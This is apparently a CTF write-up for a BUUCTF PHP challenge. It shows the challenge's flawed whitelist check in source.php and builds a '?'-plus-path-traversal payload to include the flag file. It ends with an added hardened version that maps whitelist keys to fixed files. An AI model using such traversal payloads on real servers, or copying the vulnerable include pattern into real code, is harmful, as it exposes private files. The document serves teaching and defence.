Source: BUUCTF
Open the challenge page:
Press F12 to view the page source:
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Document</title>
</head>
<body>
    <!--source.php-->
    <br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
Line 10 is a comment hinting that we should visit ./source.php.
Opening it shows the following code:
<?php
highlight_file(__FILE__);

class emmm
{
    public static function checkFile(&$page)
    {
        $whitelist = ["source" => "source.php", "hint" => "hint.php"];
        if (! isset($page) || ! is_string($page)) {
            echo "you can't see it";
            return false;
        }

        // whitelist check
        if (in_array($page, $whitelist)) {
            return true;
        }

        // question-mark truncation: keep only the part before the first '?'
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        // whitelist check
        if (in_array($_page, $whitelist)) {
            return true;
        }

        // URL decoding
        $_page = urldecode($page);
        // question-mark truncation
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        // whitelist check
        if (in_array($_page, $whitelist)) {
            return true;
        }

        echo "you can't see it";
        return false;
    }
}

if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
The last part:
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
From this we can see that file must not be empty, must be a string, and must pass the checkFile method of the emmm class.
Scrolling back up to the checkFile method of the emmm class, the hint should be hint.php.
So we build the URL: http://1a362e26-a1a1-428b-93f4-f7f849b9090f.node3.buuoj.cn/index.php?file=hint.php
After opening it we find:
Going back to the source.php code, we see the parameter passes through a whitelist check, URL decoding, question-mark truncation, a whitelist check, question-mark truncation, and a final whitelist check.
So the final payload is: hint.php?../../../../../ffffllllaaaagggg
We get the flag:
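The root cause is that checkFile validates only the substring of $page before the first '?', while the caller passes the full, unmodified $page to include. The following is an added example, not the challenge's own code: it reduces the challenge's check to its decision logic, places a hardened version beside it in which the request names a whitelist key and the server looks up the file, and runs both on a constructed input of the same shape as the payload above. The function names flawed_check and resolve_page are assumptions for this example.

```php
<?php
// Added example (not the challenge's code): the flawed check beside a hardened one.

// The challenge's check, reduced to its decision logic. Each whitelist test is
// run on a truncated or decoded copy of $page, never on what gets included.
function flawed_check(string $page): bool
{
    $whitelist = ["source" => "source.php", "hint" => "hint.php"];

    if (in_array($page, $whitelist, true)) {
        return true;
    }

    // keep only the part before the first '?'
    $prefix = mb_substr($page, 0, mb_strpos($page . '?', '?'));
    if (in_array($prefix, $whitelist, true)) {
        return true;
    }

    // decode once, then truncate at '?' again
    $decoded = urldecode($page);
    $prefix  = mb_substr($decoded, 0, mb_strpos($decoded . '?', '?'));
    return in_array($prefix, $whitelist, true);
}

// Hardened version: the request carries a whitelist *key* ("source" or "hint"),
// the server maps it to a fixed file name, and user input never reaches include().
// Anything not in the map resolves to null and is refused.
function resolve_page(string $key): ?string
{
    $whitelist = ["source" => "source.php", "hint" => "hint.php"];
    return $whitelist[$key] ?? null;
}

// Constructed test input with the same shape as the write-up's payload.
$probe = "hint.php?../../../ffffllllaaaagggg";

var_dump(flawed_check($probe));   // bool(true): the prefix "hint.php" satisfies the check,
                                  // yet the caller would include the whole string
var_dump(resolve_page($probe));   // NULL: not a key in the map, so nothing is included
var_dump(resolve_page("hint"));   // string(8) "hint.php": the only way to reach hint.php

// How the hardened lookup would be used in place of `include $_REQUEST['file']`:
// $file = resolve_page((string)($_REQUEST['file'] ?? ''));
// if ($file === null) { http_response_code(400); exit; }
// include __DIR__ . '/' . $file;
```

The design point is that validation and use must operate on the same value. In the hardened version there is no separate "checked" copy: the only thing derived from the request is an array index, and the value handed to include comes from the server-side map, so traversal sequences and '?' tricks have nothing to act on.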